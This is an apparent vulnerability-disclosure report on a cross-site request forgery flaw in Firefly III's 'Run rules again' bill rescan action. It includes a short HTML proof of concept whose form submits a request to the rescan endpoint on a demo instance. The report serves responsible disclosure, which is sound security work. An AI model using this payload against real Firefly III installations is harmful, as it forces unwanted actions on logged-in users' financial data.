Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
Valid
Reported on
Oct 23rd 2021
Description
there is a CSRF on Run rules again action
Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.firefly-iii.org/bills/rescan/2">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
We have contacted a member of the
firefly-iii
team and are waiting to hear back
2 years ago
show.twig#L99-L129
has been validated
ShowController.php#L83-L97
has been validated
to join this conversation